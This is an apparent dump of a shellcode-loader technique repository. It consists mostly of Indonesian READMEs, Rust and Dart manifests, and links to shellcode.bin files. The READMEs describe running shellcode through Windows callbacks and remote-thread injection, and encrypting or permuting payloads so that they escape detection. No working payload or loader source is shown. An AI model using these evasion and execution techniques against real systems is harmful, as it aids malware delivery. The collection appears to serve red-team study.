https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/camellia/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/lucifer/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/lucifer/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/treyfer/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/treyfer/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/permutation/fisher-yates/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/permutation/fisher-yates/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/permutation/row-ordering/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/permutation/row-ordering/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/substitution/hill-cipher/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/substitution/hill-cipher/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/hierocrypt3/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/hierocrypt3/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/misc/rust/memmap2/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader 
2 | 
3 | ### Overview
4 | 
5 | Alokasi area memory dan ubah permissions dengan [memmap2](https://crates.io/crates/memmap2).


--------------------------------------------------------------------------------
/windows/writing/permutation/column-ordering/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/permutation/column-ordering/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/substitution/affine-cipher/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/substitution/affine-cipher/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/conversion/RtlIpv4StringToAddress/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/conversion/RtlIpv4StringToAddress/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/conversion/RtlIpv6StringToAddress/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/conversion/RtlIpv6StringToAddress/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/aes/CryptDecrypt/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/aes/CryptDecrypt/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/cipherunicorn-a/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/cipherunicorn-a/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/conversion/RtlIpv4StringToAddressEx/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/conversion/RtlIpv4StringToAddressEx/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/conversion/RtlEthernetStringToAddress/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/conversion/RtlEthernetStringToAddress/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/stream/rc4/SystemFunction/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/stream/rc4/SystemFunction/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNames/c++/resource-self/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/execution/callback/EnumResourceNames/c++/resource-self/shellcode.bin


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypes/c++/resource-self/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/execution/callback/EnumResourceTypes/c++/resource-self/shellcode.bin


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNamesEx/c++/resource-self/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/execution/callback/EnumResourceNamesEx/c++/resource-self/shellcode.bin


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypesEx/c++/resource-self/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/execution/callback/EnumResourceTypesEx/c++/resource-self/shellcode.bin


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNames/c++/resource-self/resources.rc:
--------------------------------------------------------------------------------
1 | #include "resources.h"
2 | 
3 | SHELLCODE RCDATA shellcode.bin
4 | 
5 | STRINGTABLE
6 | BEGIN 
7 |     ID_STRING   "Reversing.ID Shellcode Loader"
8 | END 


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNamesEx/c++/resource-self/resources.rc:
--------------------------------------------------------------------------------
1 | #include "resources.h"
2 | 
3 | SHELLCODE RCDATA shellcode.bin
4 | 
5 | STRINGTABLE
6 | BEGIN 
7 |     ID_STRING   "Reversing.ID Shellcode Loader"
8 | END 


--------------------------------------------------------------------------------
/windows/writing/misc/rust/memmap2/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "shellcode-loader"
3 | version = "0.1.0"
4 | edition = "2021"
5 | authors = ["Satria Ady Pradana <xathrya@reversing.id>"]
6 | 
7 | [dependencies]
8 | memmap2 = "0.9.4"
9 | 


--------------------------------------------------------------------------------
/windows/execution/exception/seh-catch-exception/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing exception to run the shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode melalui exception handler.
 8 | 
 9 | ### Reference
10 | 
11 | 


--------------------------------------------------------------------------------
/windows/storage/stack/dart/pubspec.yaml:
--------------------------------------------------------------------------------
 1 | name: shellcode_loader
 2 | description:
 3 |   simple dart code to load shellcode at runtime
 4 | version: 1.0.0
 5 | 
 6 | environment:
 7 |   sdk: '>=2.10.0 <3.0.0'
 8 | 
 9 | dependencies:
10 |   ffi: ^1.0.0


--------------------------------------------------------------------------------
/linux/execution/invoke/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | ### Overview
4 | 
5 | Eksekusi shellcode dengan cast shellcode sebagai function/procedur dan memanggil shellcode secara langsung. Shellcode akan dieksekusi pada thread yang sama dengan thread pemanggil.


--------------------------------------------------------------------------------
/windows/writing/encryption/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | ### Overview
4 | 
5 | Melakukan enkripsi payload menggunakan berbagai algoritma.
6 | 
7 | Lihat juga [Crypto Reference](https://github.com/ReversingID/Crypto-Reference) untuk informasi lebih lanjut.


--------------------------------------------------------------------------------
/windows/execution/invoke/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | ### Overview
4 | 
5 | Eksekusi shellcode dengan cast shellcode sebagai function/procedur dan memanggil shellcode secara langsung. Shellcode akan dieksekusi pada thread yang sama dengan thread pemanggil.


--------------------------------------------------------------------------------
/windows/writing/permutation/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | ### Overview
4 | 
5 | Melakukan shuffle/permutation, mengacak urutan byte shellcode. Penjadwalan urutan berdasarkan seed.
6 | 
7 | Shellcode yang tersimpan memiliki format `[Seed] [Encoded Shellcode]`.
8 | 


--------------------------------------------------------------------------------
/linux/storage/stack/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Store shellcode as local data in stack (array).
4 | 
5 | ### Overview
6 | 
7 | Shellcode disimpan sebagai array of byte pada stack, dengan karakteristik adanya operasi push. Array dapat diakses melalui alamat memory relatif terhadap pointer.


--------------------------------------------------------------------------------
/windows/writing/permutation/column-ordering/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Reordering the shellcode with custom algorithm.
4 | 
5 | ### Overview
6 | 
7 | Membentuk matrix dan mengatur posisi byte berdasarkan urutan kolom.
8 | 
9 | Shellcode yang tersimpan memiliki format `[Key] [Seed] [Encoded Shellcode]`.


--------------------------------------------------------------------------------
/windows/writing/permutation/row-ordering/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Reordering the shellcode with custom algorithm.
4 | 
5 | ### Overview
6 | 
7 | Membentuk matrix dan mengatur posisi byte berdasarkan urutan baris.
8 | 
9 | Shellcode yang tersimpan memiliki format `[Key] [Seed] [Encoded Shellcode]`.


--------------------------------------------------------------------------------
/windows/writing/substitution/atbash/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Transforming the shellcode by byte substitution.
4 | 
5 | ### Overview
6 | 
7 | Menggunakan enkripsi klasik Atbash untuk mengganti byte berdasarkan pemetaan alfabet. Rumus matematis untuk enkripsi dan dekripsi (dalam 256 kemungkinan alfabet) adalah: `255-x`


--------------------------------------------------------------------------------
/windows/writing/permutation/fisher-yates/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Reordering the shellcode with custom algorithm.
 4 | 
 5 | ### Overview
 6 | 
 7 | Menggunakan Fisher-Yates Shuffle untuk melakukan permutasi.
 8 | 
 9 | ### Reference
10 | 
11 | - [Wiki Fisher-Yates Shuffle](https://en.wikipedia.org/wiki/Fisher%E2%80%93Yates_shuffle)


--------------------------------------------------------------------------------
/linux/allocation/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | ### Overview
4 | 
5 | Teknik `allocation` digunakan untuk menciptakan ruang yang cukup untuk menampung shellcode yang telah diekstrak dari ruang penyimpanan (global/stack/resource/download). Memory yang telah dialokasikan haruslah ditandai sebagai executable. Hal ini dilakukan untuk menghindari adanya exception.


--------------------------------------------------------------------------------
/windows/writing/custom/xor-pair/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Transform the shellcode with custom algorithm.
4 | 
5 | ### Overview 
6 | 
7 | Shellcode dienkripsi menggunakan XOR sederhana. Bagi shellcode menjadi rangkaian  pasangan byte. Proses enkripsi dilakukan dengan menggunakan salah satu byte sebagai key dan byte lain sebagai data untuk dilakukan XOR.


--------------------------------------------------------------------------------
/windows/storage/global/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Store shellcode as global data (array).
4 | 
5 | ### Overview
6 | 
7 | Shellcode disimpan sebagai array of byte pada segment global dan dapat diakses melalui suatu alamat memory yang konstan.
8 | 
9 | Catatan: eksekusi shellcode untuk sample akan menggunakan teknik menjalankan shellcode sebagai thread terpisah.


--------------------------------------------------------------------------------
/windows/writing/custom/xor-singlekey/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Transform the shellcode with custom algorithm.
4 | 
5 | ### Overview
6 | 
7 | Shellcode dienkripsi menggunakan XOR sederhana. Sebuah key disimpan sebagai byte pertama dan digunakan berulang untuk setiap byte shellcode.
8 | 
9 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`.


--------------------------------------------------------------------------------
/linux/permission/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | ### Overview
 4 | 
 5 | Teknik dalam `permission` adalah teknik mengubah (aktifkan/nonaktifkan) executable bit pada area memory tertentu untuk mengindikasikan apakah area memory dapat dieksekusi.
 6 | 
 7 | ### Catalog
 8 | 
 9 | Daftar teknik perubahan `permission` yang diimplementasikan:
10 | 
11 | - [mprotect](mprotect)


--------------------------------------------------------------------------------
/windows/execution/invoke/rust/with-mmap/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "shellcode-loader"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | authors = ["Satria Ady Pradana <xathrya@reversing.id>"]
 6 | 
 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 8 | 
 9 | [dependencies]
10 | libc = "0.2.151"
11 | mmap = "0.1.1"
12 | 


--------------------------------------------------------------------------------
/windows/writing/substitution/affine-cipher/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Transforming the shellcode by byte substitution.
4 | 
5 | ### Overview
6 | 
7 | Menggunakan enkripsi klasik Affine Cipher untuk mengganti byte sesuai rumus `(ax + b) mod m` dengan a=197, b=37, m=256. Dekripsi menggunakan rumus `i(y - b) mod m` dengan i merupakan inverse dari a yakni i=13, b=37, dan m=256.


--------------------------------------------------------------------------------
/windows/writing/substitution/hill-cipher/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Transforming the shellcode by byte substitution.
4 | 
5 | ### Overview
6 | 
7 | Menggunakan enkripsi klasik Hill Cipher untuk mengganti byte melalui perkalian matriks untuk setiap pasang byte. Rumus yang digunakan untuk sample ini adalah matriks `[[197, 0], [0, 173]]` dan matriks invers `[[13, 0], [0, 37]]`


--------------------------------------------------------------------------------
/windows/writing/copy/memcpy/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Writing shellcode to allocated memory.
 4 | 
 5 | ### Overview
 6 | 
 7 | Penyalinan shellcode menggunakan `memcpy`.
 8 | 
 9 | ```c++
10 | void * memcpy (void * destination, const void * source, size_t num);
11 | ```
12 | 
13 | ### Reference
14 | 
15 | - [C++ memcpy](https://www.cplusplus.com/reference/cstring/memcpy/)


--------------------------------------------------------------------------------
/linux/writing/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | ### Overview
4 | 
5 | Teknik dalam `writing` adalah metode transformasi shellcode yang tersimpan. Shellcode yang tersimpan secara plain berpotensi tinggi untuk terdeteksi sehingga shellcode harus diacak untuk menyamarkannya. Untuk mendapatkan shellcode kembali, maka proses transformasi dilakukan sebelum atau saat menulis shellcode ke area yang ditentukan.


--------------------------------------------------------------------------------
/windows/storage/section/rust/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "shellcode-loader"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | authors = ["Satria Ady Pradana <xathrya@reversing.id>"]
 6 | 
 7 | [dependencies.winapi]
 8 | version = "0.3.9"
 9 | features = [
10 |     "errhandlingapi", 
11 |     "memoryapi",
12 |     "processthreadsapi",
13 |     "synchapi", 
14 |     "winbase", 
15 |     "winnt",
16 | ]


--------------------------------------------------------------------------------
/windows/execution/asm-jmp/rust/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "shellcode-loader"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | authors = ["Satria Ady Pradana <xathrya@reversing.id>"]
 6 | 
 7 | [dependencies.winapi]
 8 | version = "0.3.9"
 9 | features = [
10 |     "errhandlingapi", 
11 |     "memoryapi",
12 |     "processthreadsapi",
13 |     "synchapi", 
14 |     "winbase", 
15 |     "winnt",
16 | ]


--------------------------------------------------------------------------------
/windows/storage/resource/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Store shellcode as embedded resource in executable.
4 | 
5 | ### Overview
6 | 
7 | Shellcode disimpan sebagai array of byte dan disematkan sebagai resource. Akses shellcode dilakukan dengan serangkaian operasi pembacaan resource.
8 | 
9 | Catatan: eksekusi shellcode untuk sample akan menggunakan teknik menjalankan shellcode sebagai thread terpisah.


--------------------------------------------------------------------------------
/windows/execution/thread/CreateRemoteThread/rust/with-windows-sys/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "shellcode-loader"
3 | version = "0.1.0"
4 | edition = "2021"
5 | authors = ["Satria Ady Pradana <xathrya@reversing.id>"]
6 | 
7 | [dependencies]
8 | windows-sys = { version = "0.48.0", features = ["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading", "Win32_System_Diagnostics_Debug", "Win32_Security"]}


--------------------------------------------------------------------------------
/windows/execution/callback/EnumWindows/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumWindows`.
 8 | 
 9 | ```c++
10 | BOOL EnumWindows (WNDENUMPROC lpEnumFunc, LPARAM lParam);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN EnumWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindows)


--------------------------------------------------------------------------------
/windows/execution/fiber/CreateFiber/rust/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "shellcode-loader"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | authors = ["Satria Ady Pradana <xathrya@reversing.id>"]
 6 | 
 7 | [dependencies.winapi]
 8 | version = "0.3.9"
 9 | features = [
10 |     "errhandlingapi", 
11 |     "memoryapi",
12 |     "processthreadsapi",
13 |     "synchapi", 
14 |     "winbase", 
15 |     "winnt",
16 | ]


--------------------------------------------------------------------------------
/windows/execution/thread/CreateThread/rust/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "shellcode-loader"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | authors = ["Satria Ady Pradana <xathrya@reversing.id>"]
 6 | 
 7 | [dependencies.winapi]
 8 | version = "0.3.9"
 9 | features = [
10 |     "errhandlingapi", 
11 |     "memoryapi",
12 |     "processthreadsapi",
13 |     "synchapi", 
14 |     "winbase", 
15 |     "winnt",
16 | ]


--------------------------------------------------------------------------------
/windows/storage/stack/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Store shellcode as local data in stack (array).
4 | 
5 | ### Overview
6 | 
7 | Shellcode disimpan sebagai array of byte pada stack, dengan karakteristik adanya operasi push. Array dapat diakses melalui alamat memory relatif terhadap pointer.
8 | 
9 | Catatan: eksekusi shellcode untuk sample akan menggunakan teknik menjalankan shellcode sebagai thread terpisah.


--------------------------------------------------------------------------------
/windows/storage/stack/rust/plain-winapi/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "shellcode-loader"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | authors = ["Satria Ady Pradana <xathrya@reversing.id>"]
 6 | 
 7 | [dependencies.winapi]
 8 | version = "0.3.9"
 9 | features = [
10 |     "errhandlingapi", 
11 |     "memoryapi",
12 |     "processthreadsapi",
13 |     "synchapi", 
14 |     "winbase", 
15 |     "winnt",
16 | ]


--------------------------------------------------------------------------------
/windows/writing/encryption/block/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Enkripsi shellcode dengan block cipher
 4 | 
 5 | ### Overview
 6 | 
 7 | Block cipher adalah jenis algoritma enkripsi terhadap blok berukuran tetap. Shellcode dianggap sebagai data plaintext dan dibagi menjadi beberapa block.
 8 | 
 9 | Algoritma menggunakan kunci simetris dimana kunci yang sama digunakan untuk enkripsi dan dekripsi.
10 | 
11 | 


--------------------------------------------------------------------------------
/windows/writing/custom/xor-singlekey-ctr/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Transform the shellcode with custom algorithm.
4 | 
5 | ### Overview
6 | 
7 | Shellcode dienkripsi menggunakan XOR sederhana. Sebuah key disimpan sebagai byte pertama dan digunakan untuk mengenkripsi shellcode. Setiap selesai mengenkripsi byte, nilai key akan meningkat.
8 | 
9 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`.


--------------------------------------------------------------------------------
/windows/execution/thread/TpSimpleTryPost/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `TpSimpleTryPost`.
 8 | 
 9 | `TpSimpleTryPost` adalah fungsi internal dan bersifat low-level.
10 | 
11 | ```c++
12 | NTSTATUS TpSimpleTryPost(PTP_SIMPLE_CALLBACK callback, PVOID args, PTP_CALLBACK_ENVIRON environ);
13 | ```
14 | 
15 | ### Reference 
16 | 


--------------------------------------------------------------------------------
/windows/writing/custom/padding-dynamic/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Transform the shellcode with custom algorithm.
4 | 
5 | ### Overview
6 | 
7 | Menyisipkan satu-byte sebagai padding block shellcode. Padding digunakan untuk menandai ukuran block atau banyaknya potongan shellcode di dalam block.
8 | 
9 | Shellcode yang tersimpan memiliki format `[M] [M-byte Shellcode] [N] [N-byte Shellcode] ... [Z] [Z-byte Shellcode]`.


--------------------------------------------------------------------------------
/windows/execution/callback/EnumObjects/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumObjects`.
 8 | 
 9 | ```c++
10 | int EnumObjects (HDC hdc, int nType, GOBJENUMPROC lpFunc, LPARAM lParam);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN EnumObjects](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumobjects)


--------------------------------------------------------------------------------
/windows/execution/callback/LdrpCallInitRoutine/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `LdrpCallInitRoutine`.
 8 | 
 9 | `LdrpCallInitRoutine` adalah fungsi internal dan bersifat low-level
10 | 
11 | ```c++
12 | char LdrpCallInitRoutine (LpCallInitRoutine callback, size_t, unsigned int, size_t)
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | 


--------------------------------------------------------------------------------
/windows/execution/callback/LineDDA/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `LineDDA`.
 8 | 
 9 | ```c++
10 | BOOL LineDDA(int xStart, int yStart, int xEnd, int yEnd, LINEDDAPROC lpProc, LPARAM data);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN LineDDA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-linedda)


--------------------------------------------------------------------------------
/windows/storage/section/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | Store shellcode as separate section in executable.
4 | 
5 | ### Overview
6 | 
7 | Shellcode disimpan sebagai array of byte pada section khusus dengan permission tertentu. Eksekusi shellcode dapat dilakukan secara langsung tanpa melakukan alokasi terpisah.
8 | 
9 | Catatan: eksekusi shellcode untuk sample akan menggunakan teknik menjalankan shellcode sebagai thread terpisah.


--------------------------------------------------------------------------------
/windows/writing/copy/RtlMoveMemory/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Writing shellcode to allocated memory.
 4 | 
 5 | ### Overview
 6 | 
 7 | Penyalinan shellcode menggunakan `RtlMoveMemory`.
 8 | 
 9 | ```c++
10 | VOID RtlMoveMemory (VOID *Destination, const VOID *Source, SIZE_T Length);
11 | ```
12 | 
13 | ### Reference
14 | 
15 | - [MSDN RtlMoveMemory](https://docs.microsoft.com/en-us/windows/win32/devnotes/rtlmovememory)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumMetaFile/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumMetaFile`.
 8 | 
 9 | ```c++
10 | BOOL EnumMetaFile(HDC hdc, HMETAFILE hmf, MFENUMPROC proc, LPARAM param);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN EnumMetaFile](https://learn.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enummetafile)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumPwrSchemes/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumPwrSchemes`.
 8 | 
 9 | ```c++
10 | BOOLEAN EnumPwrSchemes (PWRSCHEMESENUMPROC lpfn, LPARAM lParam);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN EnumPwrSchemes](https://docs.microsoft.com/en-us/windows/win32/api/powrprof/nf-powrprof-enumpwrschemes)


--------------------------------------------------------------------------------
/windows/execution/thread/CreateRemoteThread/rust/with-winapi/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "shellcode-loader"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | authors = ["Satria Ady Pradana <xathrya@reversing.id>"]
 6 | 
 7 | [dependencies.winapi]
 8 | version = "0.3.9"
 9 | features = [
10 |     "errhandlingapi", 
11 |     "memoryapi",
12 |     "processthreadsapi",
13 |     "synchapi", 
14 |     "winbase", 
15 |     "winnt",
16 | ]


--------------------------------------------------------------------------------
/windows/writing/encryption/block/camellia/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryption.
 4 | 
 5 | ### Overview
 6 | 
 7 | Menggunakan `Tiny Encryptio Algorithm` untuk melakukan enkripsi.
 8 | 
 9 | ### Reference
10 | 
11 | - [Wiki TEA Reference](https://en.wikipedia.org/wiki/Tiny_Encryption_Algorithm)
12 | - [Reversing.ID TEA Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/TEA/code.c)


--------------------------------------------------------------------------------
/windows/execution/event/SetTimer/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode using timer.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `SetTimer`.
 8 | 
 9 | 
10 | ```c++
11 | UINT_PTR SetTimer (HWND hWnd, UINT_PTR nIDEvent, UINT uElapse, TIMERPROC lpTimerFunc);
12 | ```
13 | 
14 | ### Reference 
15 | 
16 | - [MSDN SetTimer](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-settimer)
17 | 


--------------------------------------------------------------------------------
/windows/storage/stack/rust/with-wrapper/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "shellcode-loader"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | authors = ["Satria Ady Pradana <xathrya@reversing.id>"]
 6 | 
 7 | [dependencies]
 8 | windows = { version = "0.35.0", features = [
 9 |     "Win32_Foundation",
10 |     "Win32_Security",
11 |     "Win32_System_Memory" ,
12 |     "Win32_System_Threading",
13 |     "Win32_System_WindowsProgramming"
14 | ]}


--------------------------------------------------------------------------------
/windows/writing/copy/CopyMemory/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Writing shellcode to allocated memory.
 4 | 
 5 | ### Overview
 6 | 
 7 | Penyalinan shellcode menggunakan `CopyMemory`.
 8 | 
 9 | ```c++
10 | void CopyMemory (PVOID Destination, const VOID *Source, SIZE_T Length);
11 | ```
12 | 
13 | ### Reference
14 | 
15 | - [MSDN CopyMemory](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa366535(v=vs.85))


--------------------------------------------------------------------------------
/windows/writing/copy/MoveMemory/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Writing shellcode to allocated memory.
 4 | 
 5 | ### Overview
 6 | 
 7 | Penyalinan shellcode menggunakan `MoveMemory`.
 8 | 
 9 | ```c++
10 | void MoveMemory (PVOID Destination, const VOID *Source, SIZE_T Length);
11 | ```
12 | 
13 | ### Reference
14 | 
15 | - [MSDN MoveMemory](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa366788(v=vs.85))


--------------------------------------------------------------------------------
/linux/allocation/mmap/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi menggunakan `mmap`.
 8 | 
 9 | ```c++
10 | #include <sys/mman.h>
11 | 
12 | void *mmap(void addr, size_t length, int prot, int flags, int fd, off_t offset);
13 | 
14 | int munmap(void addr, size_t length);
15 | ```
16 | 
17 | ### Reference
18 | 
19 | - [Man 7](https://man7.org/linux/man-pages/man2/mmap.2.html)


--------------------------------------------------------------------------------
/linux/allocation/shmat/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi menggunakan `shmat`. Fungsi `valloc` mengalokasikan shared memory segment.
 8 | 
 9 | ```c++
10 | #include <sys/types.h>
11 | #include <sys/shm.h>
12 | 
